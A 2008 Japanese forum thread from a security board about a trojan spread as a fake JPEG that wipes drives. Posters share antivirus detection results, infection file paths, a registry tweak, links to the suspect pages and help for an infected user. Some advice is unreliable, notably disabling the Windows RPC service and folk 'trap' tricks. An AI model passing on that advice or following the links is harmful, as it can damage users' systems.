正直目から鱗
137名無しさん@お腹いっぱい。:2008/01/02(水) 00:28:53
>>135
それ何処のスレ?
俺はD:のHDDが見事にデータ飛んでるからな・・・なんか色々なパターンがあるな、どゆこと!?
138名無しさん@お腹いっぱい。:2008/01/02(水) 00:32:23
>>137
その人たちはDドライブにDVDドライブがあったんだろ
もしDドライブにFDDがあったらそれが消されてるだろうし
HDDがあったらそれが消されてるだろう

これって Dドライブから順番にEFGH・・・ってつぶしていくんだよね?
139名無しさん@お腹いっぱい。:2008/01/02(水) 00:32:38
バッチファイル微妙に書き換えてる可能性もあるからなぁ
140名無しさん@お腹いっぱい。:2008/01/02(水) 00:35:28
>>137 >>135はここ
【モ娘(狼)】踏むとHDDがフォーマットされるヤバイ画像問題について
http://mamono.2ch.net/test/read.cgi/morningcoffee/1199186657/l50#tag330
141名無しさん@お腹いっぱい。:2008/01/02(水) 00:37:40
>>138
俺はFとGのDVDドライブが消された
142名無しさん@お腹いっぱい。:2008/01/02(水) 00:45:26
どんだけIEで2ch見てるんだよw
143名無しさん@お腹いっぱい。:2008/01/02(水) 00:48:01
俺のPCはDの位置に後付のHDD接続してんだけど
症状によってはDVDドライブが逝くって書いてあったから確認してみた

・・・
動かない・・・
ウィルスにやられたかと思って色々確認してみたら
数日前に導入したwin_acceleratorの起動短縮がネックになってったっぽい
OFFにして再起動したら全く問題なかった
ふぅ、あせったぜw
144名無しさん@お腹いっぱい。:2008/01/02(水) 01:10:06
さっさと脆弱性、直せよM$

この糞企業に非難決議出ないのがおかしいな

145名無しさん@お腹いっぱい。:2008/01/02(水) 01:14:36
Mac使えばいいじゃない
146名無しさん@お腹いっぱい。:2008/01/02(水) 01:25:01
このヤバイ画像かちゅ〜しゃで踏んで開いた先が404だったんだけどセーフ?
>133しらべても問題なかったけど・・・
147名無しさん@お腹いっぱい。:2008/01/02(水) 02:03:35
ラストドライブが仮想なおいらってばすごいね!
148名無しさん@お腹いっぱい。:2008/01/02(水) 02:45:46
某所で情報貰って飛んできました

俺IE7だけど>>103が踏んでるってのが心配になって
一応セキュリティ設定とhostsは対応済みで
>>120をやっておく事にした。念の為確認だけどこれで最強?


どんだけ心配性なんだよと思われるかも知れないけど
149名無しさん@お腹いっぱい。:2008/01/02(水) 03:41:01
35 :名無し募集中。。。 :2008/01/01(火) 20:39:41.15 0
>>1
バスターの性能を試したくてあえて踏んだ
例によってブラクラ発動
バスターは無警告、無反応で使えない事が判明
再起動したけど何もなし

翌日起動したら、マイコンピュータのDVDアイコンが消えて
DVDが利用できなくなった
他にも異常が多数発生

レジストリが書き換えられていた模様
システム復元で元通り復旧

705 名前:名無し募集中。。。 [] 投稿日:2008/01/01(火) 23:38:44.79 0
マイコンピュータから
DVDドライブのアイコンが両方とも消えている・・・
おかしいと思って
デバイスマネージャで見たら
DVDの所に「!」マークが・・・

で更にプロセッサの所に「!」
どうしたら、いいんでしょうか?

748 名前:名無し募集中。。。 [] 投稿日:2008/01/02(水) 00:05:36.64 O    New!!
うちのパソもDVDやられてて
なんか踏んでたのかノートン反応無かったお

今の所、マイコンピュータのDVDアイコンが消し飛んでDVD利用出来なくなった報告が結構多い(大半はシステム復元で復旧)
ただ、HDDが飛んだっていう報告や他のデバイスが使えなくなった報告もあるので色々なパターンがある模様
http://mamono.2ch.net/test/read.cgi/morningcoffee/1199186657/
http://pc11.2ch.net/test/read.cgi/sec/1199083492/
150名無しさん@お腹いっぱい。:2008/01/02(水) 03:42:35

ttp://gunkanmaki.jog.buttobi.net/MiniReport20040313.html

もうね、これ一体何年前の話って感じ。おまいらまだ学習してないの?
少なくとも4年近くも前からずっと2ちゃんで話題になって、
鑑定スレのテンプレにもとっくに載ってるだろ。
151名無しさん@お腹いっぱい。:2008/01/02(水) 03:43:00
すまん誤爆
152名無しさん@お腹いっぱい。:2008/01/02(水) 04:45:51
怖い人は、標準のブラウザを火狐にすればいい。
IEの人は、以下を参考に。
http://kissho.xii.jp/1/src/1jyou21930.jpg

インターネットオプション(IE)の「拡張子ではなく、内容によってファイルを開く」の
項目を『無効』に設定。これで画像を擬装したhtmlファイルは無効化されます。
153名無しさん@お腹いっぱい。:2008/01/02(水) 04:50:23
画像が表示されずに直接htmlがプレーンテキストで表示された人は
jpg偽装には対応できています。
http://www5.uploader.jp/dl/tane/tane_uljp00206.jpg.html


Sleipnir系等ブラウザ側がこの設定に対応してない場合はさらに、
レジストリの設定が必要です。
以下をテキストエディタ(ノートパッド等)に保存して、
拡張子を.regに変えることでレジストリファイルが作れます。

これを右クリックから結合でレジストリに書き込まれます。

======↓ここから↓======
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_SNIFFING]
"Sleipnir.exe"=dword:00000001
======↑ここまで↑======

Sleipnir以外のIEコンポーネントブラウザを使っている場合は"Sleipnir.exe"の部分を、
使用しているブラウザのexeファイルに変えてください。
154名無しさん@お腹いっぱい。:2008/01/02(水) 05:20:23
つか日本の御三家はまだどれも対応してないのな
金払ってるの馬鹿らしくなったりしないのかね
155名無しさん@お腹いっぱい。:2008/01/02(水) 05:23:41
しょうがないよ。
旧御三家なんて一日に一回しか更新しない糞セキュリティソフトばかり。
脳豚や馬鹿フィーなんて更新料取る分ウイルスセキュリティ以下のゴミソフト
156名無しさん@お腹いっぱい。:2008/01/02(水) 07:56:00
janeもIEなんでそ?
157名無しさん@お腹いっぱい。:2008/01/02(水) 07:58:49
JaneはIEとDoeの二つ
IEのほうはもちろん感染する
158名無しさん@お腹いっぱい。:2008/01/02(水) 09:19:36
avast更新きたな
やっと対応したか
159名無しさん@お腹いっぱい。:2008/01/02(水) 10:18:35
virustotalで確認してみた。
残念ながらAvastは7.5.0.516(2008.01.01)では未対応のままです。
意外なことに動きがあったのはMSで他は以前の報告と変化なしでした。

Microsoft 1.3109 2008.01.02 TrojanDownloader:JS/Agent.JG
160名無しさん@お腹いっぱい。:2008/01/02(水) 10:34:38
>>116-167
ご苦労様です。

NOD32なんですが、今の所トロイ本体には対応してないので、WikiのNOD32の対応 ○から無しに書き換えようか、思案中。
(当方の体験版入れたVirtual PCでは、思いっきりスルーしてトロイが動作する。)

今の状態だと、誤解を招くんだと思うんだよね...今日中に対応がなかったら、NOD32の○は消す予定。

御三家の対応は、今の感じだと4日以降かな。 タイミングもあるけど、今回はずいぶん遅く感じるね。(w
161名無しさん@お腹いっぱい。:2008/01/02(水) 10:46:01
ブラウザはOpera、セキュリティソフトはバスターとAVG。
>>153を開いて「ダウンロード」をクリックしてみた。

ttp://www5.uploader.jp/dl/tane/tane_uljp00208.jpg.html

こうなって、

ttp://www5.uploader.jp/dl/tane/tane_uljp00209.jpg.html

こうなりました。

ご参考になりましたら幸いです。
162161:2008/01/02(水) 11:10:20
訂正です。 AVG→AGV
失礼しました。
163161:2008/01/02(水) 11:12:33
ありゃ?AVGで間違ってなかったですね。恥ずかしい。
164名無しさん@お腹いっぱい。:2008/01/02(水) 11:16:53
トロイ本体が欲しいんだけどスクリプトのコードが解読出来ねぇ
165名無しさん@お腹いっぱい。:2008/01/02(水) 11:24:26
>>160
御三家はいずれも外国なので正月は無関係でしょ。
てか、御三家はこれまでの対応状況からすると、最低一週間はかかるでしょ。
遅いときは一ヶ月くらいかかることも珍しくないし。
166名無しさん@お腹いっぱい。:2008/01/02(水) 11:27:09
世界規模ならまだしも地域が限定的なウイルスだから対応は遅くなりそう
167164:2008/01/02(水) 11:28:03
あ、ごめんよ
簡単に入手出来た
どうぞ好きなだけなじって下さい
常時正月は酔っているんでw
168名無しさん@お腹いっぱい。:2008/01/02(水) 12:46:32
>>161
AVG=アダルトビデオギャル
AGV=アバンギャルドビデオ
169名無しさん@お腹いっぱい。:2008/01/02(水) 12:54:59
avastも対応きてるのか…ウィルスセキュリティは相変わらずだな…
フリーのアンチソフトもいいかなとは思うんだが、また別にファイアウォールとか
入れなきゃならんのが重かったりしてうざそうな気もするんだよなあ

話聞いてると、今回のはまともに被害くらったら個人ダメージはでかいが、
データ流出系の二次被害危険は低め、気づき易い、普段からある程度気をつけてれば
あまり引っかからない、被害は日本中心ってことで危険度は低く考えられてるんだろか
170ふじこ:2008/01/02(水) 14:11:43
この下のレスのリンク先は危険ですか
http://mamono.2ch.net/test/read.cgi/newsplus/1199237647/225
171名無しさん@お腹いっぱい。:2008/01/02(水) 14:31:30
>>170
ざっとファイルの中を見たけど、別に危険じゃない。何故かカスペオヤジ怒るけど。(w

ちなみに、タイトルにある写真じゃないよ。リンク先はHTMLのjrpg偽装ファイル。中身は下記の<HTML>から下) ※ 本来の中身から、urlのhttp://は全部抜いた
リンク先のdate65125.jpgもjpeg偽装で、こっちは ttp://sakuratan.ddo.jp/uploader/source/date65124.gifの表示と、Sleipnir用の注意書き。
『 今話題のHDDをフォーマットするURLの対策不完全版です。Sleipnir用。 』とかいう説明で、何回か見た記憶あるが、何時の間にやら第4版になってるな。(w

<HTML>
<HEAD>
<META http-equiv="refresh" content="5;url= //sakuratan.ddo.jp/uploader/source/date65125.jpg">
<TITLE>test META refresh</TITLE>
</HEAD>
<BODY>
<pre>5秒後に自動で移動します。

5秒待っても自動で移動しなかった人は手動でリンククリックしてください。
リンクになって無い人は勝ち組です。URLコピペで進んでください。
<!-- これをコピペ→ sakuratan.ddo.jp/uploader/source/date65125.jpg -->
非IEブラウザで勝ち組だった人も出来ればIE等で確認しておいた方が良いです。

<a href=" sakuratan.ddo.jp/uploader/source/date65125.jpg" target="_blank"> sakuratan.ddo.jp/uploader/source/date65125.jpg</a></pre>
</BODY>
</HTML>
172ふじこ:2008/01/02(水) 14:38:56
>>171
あらま。得意げにありがとよ
173171:2008/01/02(水) 14:39:52
>>171
>ざっとファイルの中を見たけど、別に危険じゃない。何故かカスペオヤジ怒るけど。(w

ごめん、専ブラがちょうど他のファイルを開いたのとタイミングが重なっただけらしい。
もう一回チェックしたら、別に>170のファイルではカスペは何も言わなかった。
174171:2008/01/02(水) 14:43:25
>>172
気に障ったかね?(w

2chで細かいこと気にしてたらストレスたまるぜ? 自分で踏めないのを他の人が代行したんだから、それでOKじゃん。
175名無しさん@お腹いっぱい。:2008/01/02(水) 14:47:32
なんだIE7なら問題ないのか
176名無しさん@お腹いっぱい。:2008/01/02(水) 14:48:18
無駄なレスはいらん
177ふじこ(170の本物):2008/01/02(水) 14:58:50
>>171
どうもありがとうございました。

>>172
うんこをたべなさい。
178名無しさん@お腹いっぱい。:2008/01/02(水) 15:05:14
>>6
Jane doeでよかった
179名無しさん@お腹いっぱい。:2008/01/02(水) 16:01:38
「拡張子ではなく、内容によってファイルを開く」なんて仕様にしたMSってバカなの?
180名無しさん@お腹いっぱい。:2008/01/02(水) 16:02:15
その論理だとアップルはもっと馬鹿だな
181名無しさん@お腹いっぱい。:2008/01/02(水) 16:03:02
avastは更新したがこれには対応していない
182名無しさん@お腹いっぱい。:2008/01/02(水) 16:08:36
avast・・・
183名無しさん@お腹いっぱい。:2008/01/02(水) 16:10:21
データフォーク
184名無しさん@お腹いっぱい。:2008/01/02(水) 16:20:30
>>179
「拡張子によって、適切なプログラムで適切な手順でファイルを開く。それ以外に動作させない。」
なら宜し。IE6の脆弱性と捕らえて宜し。
185名無しさん@お腹いっぱい。:2008/01/02(水) 16:24:08
結局ウイルスバスターはまだ対応してないのか?
186名無しさん@お腹いっぱい。:2008/01/02(水) 16:24:59
ウイルスバスター(笑)
187名無しさん@お腹いっぱい。:2008/01/02(水) 16:28:59
ちゃちゃか すかちゃか ちゃちゃ ぷー
ウイルスバスター(笑点)
188名無しさん@お腹いっぱい。:2008/01/02(水) 16:30:23
GTドライバー柳田(笑)

このスレ住人じゃ知らないか?(w
189名無しさん@お腹いっぱい。:2008/01/02(水) 17:06:04
すまんが>>123をバカなオレでもわかるように翻訳してくれ
「平気でぶち抜いて来る奴」が意味はおろかイメージさえ湧かん
2chでわけのワカラン言葉に出会ったの実には5年ぶりぐらいだw
190名無しさん@お腹いっぱい。:2008/01/02(水) 17:08:02
「NISとAntiVirを同時常駐させてる馬鹿もいるのに」ってことじゃないの?そう解釈したけど。
ってかAntiVirを使いこなせるだけのスキルがあるなら同時常駐やめろよw
191名無しさん@お腹いっぱい。:2008/01/02(水) 17:18:36
尼に行くと、NISとNAVの同時購入を勧めてるよw
192名無しさん@お腹いっぱい。:2008/01/02(水) 17:20:08
193名無しさん@お腹いっぱい。:2008/01/02(水) 17:22:06
>>189
信頼性の高いウイルスソフトウェアでも対応できてないウイルスって意味じゃないの?
194名無しさん@お腹いっぱい。:2008/01/02(水) 17:24:23
AntiVirとNAVは全然違うだろ?
195名無しさん@お腹いっぱい。:2008/01/02(水) 17:44:21
>>6見ると、doeは大丈夫とあるんですけど、
ウチのは、
JaneDoe View α ( build date: 061208 )
なんですが、大丈夫と言うことでしょうか?
196名無しさん@お腹いっぱい。:2008/01/02(水) 17:47:20
うむ、セーフだ
197ふじこ(170の本物):2008/01/02(水) 17:49:07
だいたいさ。大丈夫?ってカキコできてんのに、なに言いたいわけ?
そんなやつは、うんこをたべなさい。大丈夫だから。
198名無しさん@お腹いっぱい。:2008/01/02(水) 17:50:51
バスターとAVG一緒にいれても大丈夫ですか?
199ふじこ(170の本物):2008/01/02(水) 17:57:11
私は、バイブとちnこ一緒にいれても大丈夫でした
200名無しさん@お腹いっぱい。:2008/01/02(水) 18:02:20
>>198
bot1.4とAVG7.5で問題なく使えてる。bot1.5は知らん。
201名無しさん@お腹いっぱい。:2008/01/02(水) 18:02:58
>>160
kasperskyが下の名前で検出する方は本日未明Esetに検体送った。
http://www.virustotal.com/analisis/f205c97204f0185d9d4c73e8957f01dc

最初の1230の方は、誰かが送ると思ってもてあそんで捨てた。
VirusTotalで何度も再検査したのでVirusTotalからベンダーの方に行ってないかな。
202名無しさん@お腹いっぱい。:2008/01/02(水) 18:04:45
>>198
すまん見間違えた。バスターね。バスターは無理ではないが止めた方がいい。
理由はググレばわかる。
203名無しさん@お腹いっぱい。:2008/01/02(水) 18:14:26
まとめサイトに書いてある、これどーいうこと?
自己で対策してないPCでも大丈夫なん?

>既に沈静化しました。新たに感染することはありません。

HDDをフォーマットするブラクラ まとめwiki - トップページ
http://www13.atwiki.jp/burakura_hdd/
204名無しさん@お腹いっぱい。:2008/01/02(水) 18:21:40
もっと先まで読め。
>報告にも偽のものがあるようなので注意。
205名無しさん@お腹いっぱい。:2008/01/02(水) 18:47:09
本当かどうかの裏を取れないやつがwikiのホストやってもしょうがない
206名無しさん@お腹いっぱい。:2008/01/02(水) 18:55:16
>>202
サンクスです!
ググってみます
207名無しさん@お腹いっぱい。:2008/01/02(水) 19:32:19
危険ポートを閉じることでセキュリティを強化する。

【ポート135の役割】
Windows2000/XPは、標準で分散オブジェクト技術(以下:DCOM)を利用しています。
このDCOMを利用すると、他のPCのDCOMソフトを遠隔操作できます。
遠隔操作をする場合に、相手PCに問い合わせをする時のに使用するのがポート135です。
場合によっては、遠隔操作をされてしまう可能性があるものですので、このポートは停止しておきましょう。

ポート番号「135」、「リモート管理・操作等のサービスへのアクセス」
■ポート135を閉じる
「コントロールパネル」 -> 「管理ツール」 -> 「サービス」 -> 「Remote Procedure Call」を選択する。
「Remote Procedure Call (RPC) エンド ポイント マッパーや各種の RPC サービスを提供します。」
をダブルクリックし、プロパティを開く。
スタートアップの種類を「無効」にし、OKボタンをクリックしプロパティ画面を閉じる。
変更をしたらPCを再起動する。

ポート番号「445」、「ファイル共有等のサービスへのアクセス」
■ポート445を閉じる
「コントロールパネル」 ->「システム」 ->「ハードウェア」 ->「デバイスマネージャ」の「表示」メニューから
「非表示のデバイスドライバの表示」を選ぶと「プラグアンドプレイではないドライバ」という項目が一覧に加わる。
このツリーを展開して「NetBIOS over TCP/IP」のプロパティを開く。
ここで「ドライバ」タグを選択し、「スタートアップ」の種類を「無効」にする。
変更をしたらPCを再起動する。

ポート135 445
ttp://www.google.com/search?hl=ja&q=%E3%83%9D%E3%83%BC%E3%83%88135+445&lr=lang_ja
208名無しさん@お腹いっぱい。:2008/01/02(水) 20:57:00
>AntiVirを使いこなせるだけのスキル
AntiVirの操作性はすんごく理にかなっていて優れると思う。
UIが洗練されてるというか、英語であることを差し引いても
使いやすい。ちなみに個人的にもっとも使いにくいと思うのが
nod32。amonとかimonとか変に分離しちゃって抵抗感がある。
NISも使いにくい部類。
209名無しさん@お腹いっぱい。:2008/01/02(水) 21:01:03
カスペも使いにくいよ。
逆にセキュ板で叩かれてるバスターはなんだかんだいっても使い勝手はいい。
ま、有料ソフトはカスペ系以外全滅なのは残念だ。
馬鹿フィーはそれ以前に糞すぎるので失せろという感じだけど。
210名無しさん@お腹いっぱい。:2008/01/02(水) 21:05:54
カスペ以外全滅なんだけど→⇒それでも、それに続くのは唯一バスターということですね?w
211名無しさん@お腹いっぱい。:2008/01/02(水) 21:18:55
沈静化したっぽいが、気になる人もいそうなので一応貼る。

2008年1月2日 20:00頃 VirusTotal再解析結果
http://www.virustotal.com/jp/analisis/d9c375d91347f2c66b00348869fa73f3

【対応済(8本)】
アンチウイルス     更新日   結果
AntiVir          2008.01.02 TR/Dldr.Agent.aqr.20
AVG           2008.01.01 Small.2.BJ
F-Secure        2008.01.02 Trojan-Downloader.JS.Agent.aqr
Ikarus          2008.01.02 Trojan-Downloader.JS.Agent.aqr
Kaspersky        2008.01.02 Trojan-Downloader.JS.Agent.aqr
Microsoft        2008.01.02 TrojanDownloader:JS/Agent.JG
Sophos          2008.01.02 Troj/Iframe-N
Webwasher-Gateway 2008.01.02 Trojan.Dldr.Agent.aqr.20

【メジャー所で未対応】
Avast         2008.01.01
BitDefender     2008.01.02
McAfee        2007.12.31
NOD32v2       2008.01.02
Symantec       2008.01.02
VirusBuster     2008.01.01

Microsoft、対応したなぁ...御三家、面目丸つぶれだのう。
212名無しさん@お腹いっぱい。:2008/01/02(水) 21:20:32
MSのは対応したといってもそれはOneCareではなく企業向けの方だろ?
213名無しさん@お腹いっぱい。:2008/01/02(水) 21:21:44
>>210
有料ソフトだと、F-Secureも早かったよ。まあ、カスペエンジンだからかもしれんけど。
214名無しさん@お腹いっぱい。:2008/01/02(水) 21:22:58
未だに対応してない会社は潰れたほうがいい
215名無しさん@お腹いっぱい。:2008/01/02(水) 21:24:36
スマンテッコと馬鹿フィーはさっさと潰れろ
216名無しさん@お腹いっぱい。:2008/01/02(水) 21:25:17
カスペってバグ多い気がするんだけど、日本語版だけ?
217名無しさん@お腹いっぱい。:2008/01/02(水) 21:25:21
   _、_
 ( ,_ノ` )      n
 ̄     \    ( E) アボジにおまかせ!!
フ AVG /ヽ ヽ_//
218名無しさん@お腹いっぱい。:2008/01/02(水) 21:25:30
このスレの>>80をクリックしてしまいました
本当にリンク先に行っていいかを確認する「よろしければクリックしてください」という画面に
いったんですがなんか怖くなってそこで閉じました 大丈夫でしょうか?

http://namidame.2ch.net/test/read.cgi/news/1199269366/l50
219211:2008/01/02(水) 21:26:45
>>212
あれ、そうなの? ちょっとVirtual PCで試してみるんで、報告待ってて。
220名無しさん@お腹いっぱい。:2008/01/02(水) 21:33:06
間可否ーのなんたらがインストールされていません・・・が出て
筆ぐるめが使えず。
いろいろやってたらファイルが消えたんですが・・・・
これってやばくない?
221211:2008/01/02(水) 21:52:58
>>212
ご期待に添えず残念ですが、OneCareで検出隔離できました。検出名称:TrojanDownloader:JS/Agent.JG
なんで、MicrosoftのOneCareも対応済みで間違いないです。(Virtual PC + 体験版ですが)

御三家、早く対応しろよ〜...M$に負けてんじゃねぇか。(w
222名無しさん@お腹いっぱい。:2008/01/02(水) 22:01:42
>>221
いや別にいいけどVirustotalにしてもAV-Test.orgにしてもただ単に「MicroSoft」しか載せてないからややこしい。
しかも個人向け(OneCare)と企業向けは検出率は違うとも公表してるから第三者機関でもはっきりさせて欲しい。

あと御三家なんてウイルスセキュリティの足元にも及ばないカスソフトでしょ。
223211:2008/01/02(水) 22:13:53
>>222
まあ確かに。

こうなってくると、御三家で最初に対応する所と、一番最後になるのがどこかって所にポイントが変わる。

正直、興味津々...御三家のどこが対応最初だろうね。
224211:2008/01/02(水) 22:29:33
>>218
さて、別のことしてて遅れたが、

>本当にリンク先に行っていいかを確認する「よろしければクリックしてください」という画面に
>いったんですがなんか怖くなってそこで閉じました 大丈夫でしょうか?

ついでにVirtual PCで確かめてみたが、クリックして最初に行くのはimu.nuという転送サイトだから、
そこで閉じていれば実際にはリンク先に飛んでないから大丈夫。

リンク先に飛んでいくと、今回のトロイ騒動で最初に出てくるエロ画像が表示される。
これ、元のトロイの話知ってないと、どっきりも何もしないわな。
225名無しさん@お腹いっぱい。:2008/01/02(水) 22:44:14
>>224
まじありがとうございます!
安心しました!!
226225:2008/01/02(水) 22:46:01
ここIDないんですね
すいません218でした
感謝です
227名無しさん@お腹いっぱい。:2008/01/02(水) 23:06:59
2月でノートン切れるし、消してAVG入れようかと思ってるんですが、
ノートン関連を綺麗に全部消さないとマズい?
228名無しさん@お腹いっぱい。:2008/01/02(水) 23:08:26
ぎぎぎのアドレスを踏んで2,3日目が経過しPC終了せずに
今頃になってスタートアップ見て感染されたのが確認できたのですが・・・
感染したということはもう手遅れなんでしょうか?
229名無しさん@お腹いっぱい。:2008/01/02(水) 23:11:26
>>228
2,3日の間は問題なくPC作動してたのですか?
230名無しさん@お腹いっぱい。:2008/01/02(水) 23:13:38
>>229
IEが重く感じることがありましたが・・・
勝手にフォーマットされたりだとかということは何もありませんでした。
231名無しさん@お腹いっぱい。:2008/01/02(水) 23:16:42
ぎぎぎのアドレスというのはどこで踏んだのですか?
2ちゃんねる内のものですか?
232名無しさん@お腹いっぱい。:2008/01/02(水) 23:17:35
>>231
2ちゃんねるにぎぎぎのアドレスがあったのでつい踏んでしまいました
233名無しさん@お腹いっぱい。:2008/01/02(水) 23:24:36
>>232
そのものズバリを踏んだのですか
踏んだら言われてるよな画像が出たりしましたか?
234名無しさん@お腹いっぱい。:2008/01/02(水) 23:28:58
AmiLaLa騒動を思い出した奴・・いる?
235名無しさん@お腹いっぱい。:2008/01/02(水) 23:30:25
>>233
例の画像が出ました。
そのあとも何度も出てくるエラーを慌ててエンターキーで沈めた後そのブラウザを閉じました
その間、ノートン先生が何度も反応してましたが、内容は覚えてません・・・。
それからPCは終了せずにサイト徘徊やらしてました。
今頃になって危険なウィルスだったということを知った状況です・・・。
236名無しさん@お腹いっぱい。:2008/01/02(水) 23:34:17
スタートアップでも見てみれば良いかね。
例のbatファイルがあれば食らってるからautoexec辺りもチェック、って所か。
237名無しさん@お腹いっぱい。:2008/01/02(水) 23:34:35
>>235
大変でしたね…スタートアップにはなんというファイルがありましたか?
WinUpd91.txt .bat でしょうか?
238名無しさん@お腹いっぱい。:2008/01/02(水) 23:36:06
>>237
まさにそれがありますね・・・これ削除したほうが良いんでしょうか?
239名無しさん@お腹いっぱい。:2008/01/02(水) 23:42:35
あるちゅうことは思い切り食らってるな。マシンを数日間再起動してないから助かってるという。
そのまま再起動したらトロイが動いてあぼんするな。
240名無しさん@お腹いっぱい。:2008/01/02(水) 23:43:29
>>238
いや私も初心者でそこのとこがよくわからなくて
お役に立てずすいません…
241名無しさん@お腹いっぱい。:2008/01/02(水) 23:45:49
>>239
こ、こわ・・・奇跡的に生きているということか・・・
とりあえずこれ削除したあと、どうすれば良いか分かりますか・・・?
242名無しさん@お腹いっぱい。:2008/01/02(水) 23:49:28
まず必要なファイルを逃がしておいたら。
KIS7の体験版を落としてチェック。
駄目もとでファイルを削除。
次にDAEMONで仮想CDをDとZに設定してトラップを張る。
243名無しさん@お腹いっぱい。:2008/01/02(水) 23:49:38
スタートアップって左下のスタートってとこから全てのプログラムってとこの
ことですか?初心者ですいません
244名無しさん@お腹いっぱい。:2008/01/02(水) 23:51:34
>>238
ニュース速報板ではスタートアップにあるファイルを削除だけで
問題なく再起動できたという報告があがっていた。
が、対応してるアンチウイルスソフト使って駆除を試みた方がいい気がする。
niftyのオンラインスキャン・・・でも感染した人は途中エラーで中断させられたらしい。
>>242
カスペ体験版はインストール後に再起動を要求されるというとんでもないジレンマだったらしい。
245名無しさん@お腹いっぱい。:2008/01/02(水) 23:52:23
>>242
駄目もとでファイルを削除って言うのは例のスタートアップにあるファイルですよね?
とりあえず、その手順を踏んでみたいと思います。

>>243
スタートアップの場所はWikiにかいてありますよ
246名無しさん@お腹いっぱい。:2008/01/02(水) 23:53:22
>>244
おおっと・・・そうなんですか・・・
とりあえずスタートアップのやつはにくいので消しときます
247名無しさん@お腹いっぱい。:2008/01/02(水) 23:54:46
      / ̄ ̄ ̄ ̄ ̄ ̄ \
/⌒ヽ  / ''''''     ''''''   ヽ
|  /   | (●),   、(●)   |
| |   |    ,,ノ(、_, )ヽ、,,     |
| |   |    `-=ニ=- '      |  
| |   !     `ニニ´      .!      天狗じゃ、これも天狗の仕業じゃ!
| /    \ _______ /
| |    ////W\ヽヽヽヽ\
| |   ////WWWヽヽヽヽヽヽヽ
| |  ////WWWWヽヽヽヽヽヽヽ
E⊂////WWWWWヽヽヽヽヽヽヽ
E////         ヽヽヽヽヽヽヽ
| |  //WWWWWWWヽヽヽヽヽヽヽ
248名無しさん@お腹いっぱい。:2008/01/03(木) 00:00:53
            , ;,勹
           ノノ   `'ミ
          / y ,,,,,  ,,, ミ
         / 彡 `゚   ゚' l
         〃 彡  "二二つ
         |  彡   ~~~~ミ      はいはい、わしのせい わしのせい
     ,-‐― |ll  川| ll || ll|ミ―-、
   /     |ll        |   ヽ
  /       z W`丶ノW     ヽ
 /        \\   / /      |
/    天      \`i / /  狗   |
249名無しさん@お腹いっぱい。:2008/01/03(木) 00:02:36
>>スタートアップの場所はWikiにかいてありますよ

見ましたがどうも私には難しくてよくわかりません
どうすればスタートアップというものをみれるんでしょうか?

XP IE6 です
250名無しさん@お腹いっぱい。:2008/01/03(木) 00:06:49
>>249
少しはぐぐれ
251名無しさん@お腹いっぱい。:2008/01/03(木) 00:06:54
C:\WINDOWS\スタート メニュー\プログラム\スタートアップ
252名無しさん@お腹いっぱい。:2008/01/03(木) 00:07:23
感染確認
心配な人、↓にbatファイルが無ければおk

スタートアップ
Windows 9x/Me
C:\WINDOWS\All Users\スタート メニュー\プログラム\スタートアップ\BugFix[ランダムな数値].txt(空白).bat
Windows NT/2000
C:\WINNT\Profiles\All Users\スタートメニュー\プログラム\スタートアップ\IE_Up[ランダムな数値].txt(空白).bat
Windows XP
C:\Documents and Settings\All Users\スタート メニュー\プログラム\スタートアップ\WinUpd[ランダムな数値].txt(空白).bat

AUTOEXEC.BAT
Windows 9x
C:\AUTOEXEC.BAT .txt
Windows XP
C:\WINDOWS\SYSTEM32\AUTOEXEC.NT .txt

クイック起動
Windows 9x
C:\WINDOWS\Application Data\Microsoft\Internet Explorer\Quick Launch\AntiVirus[ランダムな数値].txt(空白).bat
Windows 2000/XP
C:\Documents and Settings\All Users\Application Data\Microsoft\Internet Explorer\Quick Launch\SecurityAlert[ランダムな数値].txt(空白).bat
253名無しさん@お腹いっぱい。:2008/01/03(木) 00:09:21
http://www.nifty.com/security/vcheck/?mid=601287&lid=20
後、だめもとでniftyのオンラインウイルスチェックね。
これで検出できて駆除できたら楽だろうとは思うが、
途中で止まる場合は手動で消すしかないかもな。
254名無しさん@お腹いっぱい。:2008/01/03(木) 00:11:23
>>253
バックアップ作業してるのであとでやってみます
手動で消すのがどうやるか微妙なところですが・・・
255名無しさん@お腹いっぱい。:2008/01/03(木) 00:12:32 BE:487474-PLT(12567)
>>249
まず、
WindowsキーとEキーの同時押しでエクスプローラーが立ち上がる
※IEじゃないぞ
立ち上がったら、左側のツリー構造の中から
「+マイ コンピュータ」って部分を探し出す
見つけたらこの「マイ コンピュータ」の部分をクリック
※マウスの左ボタン1回押しのことね
これで選択状態になったと思う
※いじって無ければ「マイ コンピュータ」の部分が紺色になったかな?
そしたら、テンキーの「*」を押すんだ
よし、ここまでやってみて!
256名無しさん@お腹いっぱい。:2008/01/03(木) 00:15:03
あ、ちなみにAUTOEXEC.BAT は無くって
クイック起動は
C:\Documents and Settings\All Users\Application Data\Microsoft\
まではあって
Internet Explorerフォルダ自体が存在しなかったんですが・・・
感染はスタートアップだけに抑えられてるということなのかな・・・
257名無しさん@お腹いっぱい。:2008/01/03(木) 00:22:26
>>211
なんでVirusBusterがメジャーなのかと思ったけど、virustotalに出てるVirusBusterは
http://www.virusbuster.hu/ だからトレンドマイクロとは違うよ
258名無しさん@お腹いっぱい。:2008/01/03(木) 00:24:50
>>256
エクスプローラを開いたら、ツール(T) → フォルダ オプション(O)を選んで、
表示 → 詳細設定の項目から

・ファイルとフォルダの表示 → すべてのファイルとフォルダを表示する を選ぶ
・保護されたオペレーティング ファイル システムを表示しない(推奨)のチェックを外す

この2つをやらないとAUTOEXEC,BATは見えない。(無いように見える)

うかつに再起動しないようにね。 正直、貴方の書き込みを見ていると、どうもシステムが吹っ飛ぶかどうかの
瀬戸際にいるように見える。
259名無しさん@お腹いっぱい。:2008/01/03(木) 00:27:13
ああそっか、デフォ設定だとそうなってるから見えないんだっけ
慣れてると真っ先につつく項目だから忘れてた
260211:2008/01/03(木) 00:27:36
>>257
何という落とし穴。(w

こっちの仮想環境のバスターでも未だに検知できないんで、てっきりVirusTotalの方もバスターだと思ってた。

じゃあ、バスターの方は私の仮想環境で確認続けて、検出できるようになったらスレに報告入れるね。
261名無しさん@お腹いっぱい。:2008/01/03(木) 00:35:24
削除でいけるような気がするが。
初心者でなく自作PCだったら余計なHDDは電源を落とした際にすべて切り離すんだが。
嘘か誠か解らんが、ターゲットとなるC以外のHDDが無い場合はDVDプレイヤーを壊すとか壊さないとか。
だからDAEMONで何かをマウントしておき、DVDドライブの両脇にトラップで張りつかしておければ。
